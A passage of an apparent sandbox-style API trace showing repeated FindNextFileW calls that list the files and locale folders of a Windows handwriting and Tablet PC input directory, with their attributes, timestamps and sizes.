lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar-SA", cAlternateFileName="")) returned 1 [0042.509] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0042.509] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90daefa5, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x90daefa5, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0042.510] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c92176b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c92176b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xdd6ec0f0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x2f200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ConvertInkStore.exe", cAlternateFileName="")) returned 1 [0042.510] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0042.510] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0042.510] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0042.510] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0042.510] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0042.510] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0042.510] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0042.511] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0042.511] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f4e4a1, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x92f4e4a1, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x92f9a75d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0042.511] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c53a9c4, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5c53a9c4, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe29c9700, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickLearningWizard.exe", cAlternateFileName="")) returned 1 [0042.511] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0042.511] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0042.511] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-IL", cAlternateFileName="")) returned 1 [0042.511] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0042.512] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0042.512] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ece8572, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2ece8572, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2ea60e45, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0042.512] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HWRCustomization", cAlternateFileName="HWRCUS~1")) returned 1 [0042.512] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f7eaa54, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2f7eaa54, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2f301d57, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb6710, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrenalm.dat", cAlternateFileName="")) returned 1 [0042.512] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33535c00, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x33535c00, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x332fa78d, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xc7240, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0042.512] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bd661d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x32bd661d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x32a7f9d8, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x10ca50, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrlatinlm.dat", cAlternateFileName="")) returned 1 [0042.513] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d94dbb3, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3d94dbb3, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3c28ab1e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x2e99a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwruklm.dat", cAlternateFileName="")) returned 1 [0042.513] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da5853e, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3da5853e, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3d7f6f6e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x21ff00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwruksh.dat", cAlternateFileName="")) returned 1 [0042.513] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3db89026, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3db89026, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3d3cc942, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x30c330, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrusalm.dat", cAlternateFileName="")) returned 1 [0042.513] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dbfb43d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3dbfb43d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3da7e69b, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x3ee0d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrusash.dat", cAlternateFileName="")) returned 1 [0042.513] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c4bfb78, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x4c4bfb78, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x298e8420, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x56400, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkDiv.dll", cAlternateFileName="")) returned 1 [0042.513] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c412911, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c412911, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x29a8c2e0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x201800, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkObj.dll", cAlternateFileName="")) returned 1 [0042.513] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eab8150, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5eab8150, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe4490e80, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x61000, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkWatson.exe", cAlternateFileName="")) returned 1 [0042.513] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7700d105, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x7700d105, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe45c2150, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x5da00, dwReserved0=0x0, dwReserved1=0x0, cFileName="InputPersonalization.exe", cAlternateFileName="")) returned 1 [0042.513] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91865215, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x91865215, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa20, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipscat.xml", cAlternateFileName="")) returned 1 [0042.514] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27bfdab7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27bfdab7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x99e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipschs.xml", cAlternateFileName="")) returned 1 [0042.514] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipscht.xml", cAlternateFileName="")) returned 1 [0042.514] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipscsy.xml", cAlternateFileName="")) returned 1 [0042.514] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsdan.xml", cAlternateFileName="")) returned 1 [0042.514] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa38, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsdeu.xml", cAlternateFileName="")) returned 1 [0042.514] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c6fece, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c6fece, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa12, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsen.xml", cAlternateFileName="")) returned 1 [0042.514] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsesp.xml", cAlternateFileName="")) returned 1 [0042.514] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58cd8515, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x58cd8515, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x5ca35e50, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="IPSEventLogMsg.dll", cAlternateFileName="")) returned 1 [0042.515] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c9602b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c9602b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa62, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsfin.xml", cAlternateFileName="")) returned 1 [0042.515] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa44, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsfra.xml", cAlternateFileName="")) returned 1 [0042.515] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipshrv.xml", cAlternateFileName="")) returned 1 [0042.515] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9de, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsita.xml", cAlternateFileName="")) returned 1 [0042.515] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d08442, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d08442, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9188b373, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsjpn.xml", cAlternateFileName="")) returned 1 [0042.515] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipskor.xml", cAlternateFileName="")) returned 1 [0042.515] FindNextFileW 